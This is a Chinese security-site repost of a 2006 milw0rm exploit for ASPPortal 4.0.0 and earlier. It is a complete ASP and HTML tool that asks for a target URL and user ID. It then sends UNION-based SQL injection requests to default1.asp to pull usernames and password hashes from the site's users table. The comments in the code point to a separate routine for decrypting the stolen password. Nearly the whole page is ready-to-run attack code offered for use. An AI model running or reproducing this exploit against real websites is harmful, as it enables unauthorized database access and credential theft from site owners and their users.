首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit
来源:http://www.milw0rm.com/ 作者:ajann 发布时间:2006-11-13  

<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>

<%

'===============================================================================================
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit1.asp

'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
'===============================================================================================
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke

%>

<html>
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
<head>

<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}

function functionControl2(){
if(document.form1.field1.value==""){

alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");

}
}

function writetext() {

if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'

}
}
function write(){
setTimeout("writetext()",1000);
}

</script>


</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">

<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal <=</b>v4.0.0(default1.asp) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>

</table>

<div id=htmlAlani></div>

<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>

<%

If islem = "get" Then

string1="default1.asp"
string2="default1.asp"
cek= Request.Form("id")


targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)

If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")

Else
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")

Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")

Else
%>

<%

target1 = targettext+string1
target2 = targettext+string2

Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "POST" , come, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take = .Responsetext
End With
SET objtake = Nothing
End Function

Public Function take1(come1)
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake1
.Open "POST" , come1, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take1 = .Responsetext
End With
SET objtake1 = Nothing
End Function

get_username = take(target1)
get_password = take1(target2)

getdata=InStr(get_username,"Poll Question:</b> " )
username=Mid(get_username,getdata+24,14)
passwd=Mid(get_password,getdata+24,14)

%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">            
<b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">           
<b><font size="2" face="Arial"> User Password:</font></b></td>
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr>

</table>

<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form>

</center>

<script language="JavaScript">
write()
functionControl1()
</script>

</body>
</html>

<%
End If
End If
End If
End If
Set objtake = Nothing
%>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Munch Pro 1.0 (switch.asp) Rem
·CMSmelborp Beta (user_standard
·Rama CMS <= 0.68 (Cookie: l
·Links 1.00pre12 (smbclient) Re
·PHPWind <= 5.0.1 (AdminUser
·WinZIP <= 10.0.7245 (FileVi
·phpwcms <= 1.2.6 (Cookie: w
·Kerio WebSTAR 5.4.2 (libucache
·AspPired2Poll <= 1.0 (MoreI
·WinZIP <= 10.0.7245 (FileVi
·MS Internet Explorer 6/7 (XML
·UniversalFTP 1.0.50 (MKD) Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved